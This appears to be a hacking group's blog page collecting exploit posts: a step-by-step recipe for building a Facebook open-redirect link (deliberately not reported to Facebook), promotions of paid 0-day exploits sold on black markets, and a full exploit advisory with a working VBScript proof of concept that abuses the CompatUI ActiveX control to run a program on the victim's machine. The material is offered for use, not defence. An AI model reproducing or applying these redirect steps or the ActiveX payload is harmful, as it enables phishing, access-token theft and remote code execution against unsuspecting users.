Facebook open URL redirection vulnerability

Algerian Security Researcher "Asesino04" The Black Devils discovered an open URL redirection vulnerability in facebook that allowed attacker to have a facebook.com link edirect to any website without "Leave facebook" comment from facebook

This kind of  vulnerability is used to trick the victime by clicking on a trusted link whcih is designed to lead the victime to a malcious website .

Also this  vulnerability speacially if it was used to make a redirection on third part application can allowed attcker to steal the access token [Oauth Bug] which is very critical and dangerous .


The Founde of the exploit who is a member also in 1337DAY Team didn't report the bug to facebook


The vulnerability exists on the page where any person can download IOS or Android Sdk
You go to :

https://developers.facebook.com/docs/android/

and you copy the link of "download sdk"

https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://developers.facebook.com/resources/facebook-android-sdk-current.zip

# you keep only this 
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=

# then you add to it 
https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

#so it became like that : 

https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

then it got redirect
https://www.facebook.com/campaign/landing.php?url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

:)
The Bug have  full discolure
http://packetstormsecurity.com/files/124059/Facebook-Open-Redirection.html
http://exploitsdownload.com/exploit/na/facebook-open-redirection

A proof of Concept :

Facebook Send Messages From Anyone 0day

A new exploit allowed the attacker to send PM from any facebook account without access to the victime account and also can send attachment
the exploit was published yesterday on 1337day.com
http://1337day.com/exploit/description/21151
the price of the exploit was 600$
the  message can't be detected by facebook
the video shows how to exploit it

 

and also there is another vedio show how to send attachment 

Windows7 Remote Desk Top denial of service vulnerability

An Algerian pentesting team "The Black Devils " discovered a bug in remote desktop on windows7 allowed an attacker to use a "DOS3 attck against victime Pc
the exploit wa published on Inj3ct0rs
and this is  a vedio explain the exploitation

the exploit is written in 2 languages [perl & python]
and also there is a module written in metasploit [ruby] but
 not bublished yet

Reported a Bug To facebook

yesterday when i was on facebook i discovered a bug on facebook , i reported it waiting for response

AK-Fuzzer 1.0 Released

AK-Fuzzer 1.0 Released
=================
Ak-Fuzzer1.0 released today, and you can download it from here
https://github.com/Asesino04/AK-Fuzzer

this fuzzer is a double local & remote fuzzer ,but it's only a simple version and the creator will devellop it sonn as he can

RealPlayer 16.0.2.232 Multiple Vulnerabilities 0-Day

RealPlayer 16.0.2.232 is suffring from Multiple Vulnerabilities
An Algerian security researcher has found Multiple Vulnerabilities in real player the latest version and publishe it in black markt (120 $)
Real player is no longr safe cause this Vulnerabilities allowed an attacker to exécute a malcious code in Target computer , the Vulnerability is also written in msf module so it' easy to exploit using metasploit

CompatUI ActiveX Control <= Remote Command Execution

# Exploit Title: CompatUI ActiveX Control   <= Remote Command Execution

# Date: 26/02/2013

# Author: The Black Devils

# Home: 1337day Exploit DataBase 1337day.com

# Category : [ remote ]

# Dork : [ n / a ]

# Type : Windows

# Tested on: Internet Explorer 6 + 7 on Win Xp SP2

# Special Thanks to Ness Oum El Bouaghi

 

 

</==========================>

 This was written for educational purpose. Use it at your own risk.

 Author will be not responsible for any damage.

/=============================/>

 

  

 File:   C:\WINDOWS\system32\compatui.dll

 CLSID:  {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}

 ProgID: COMPATUILib.ProgView

  

Class Util

GUID: {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}

Number of Interfaces: 1

Default Interface: IUtil

RegKey Safe for Script: False

RegkeySafe for Init: False

KillBitSet: False

 

 

 /==========> Regisers

EAX 00000000

ECX BBEF9920

EDX 00000083

EBX 00000000

ESP 0012D180

EBP 0012D1A0

ESI 0012D1BC

EDI 00000000

EIP 7C91EB94 ntdll.KiFastSystemCallRet

C 0  ES 81A6 32bit 0(0)

P 1  CS 001B 32bit 0(FFFFFFFF)

A 0  SS 0023 32bit 0(FFFFFFFF)

Z 1  DS 9920 32bit 0(0)

S 0  FS 003B 32bit 7FFDD000(FFF)

T 0  GS 81A1 32bit 0(0)

D 0

O 0  LastErr ERROR_SUCCESS (00000000)

EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)

ST0 empty -5.6808232650904289540e-3484

ST1 empty -UNORM 9654 00000000 F0499644

ST2 empty -UNORM C0FD 00000000 0012D6D8

ST3 empty 0.0000000146950918570e-4933

ST4 empty -UNORM 9644 00000000 00000000

ST5 empty -1.2922186488787218470e+2437

ST6 empty -1.3850745354512915700e+4024

ST7 empty -UNORM 9644 00000000 00000083

               3 2 1 0      E S P U O Z D I

FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)

FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

 

 

  

 / =========> Proof Of Concept

 ------------------------------

 <object classid='clsid:0355854A-7F23-47E2-B7C3-97EE8DD42CD8' id='compatUI'></object>

 <script language='vbscript'>

 compatUI.RunApplication 1, "calc.exe", 1

 </script>

  

 / ===========>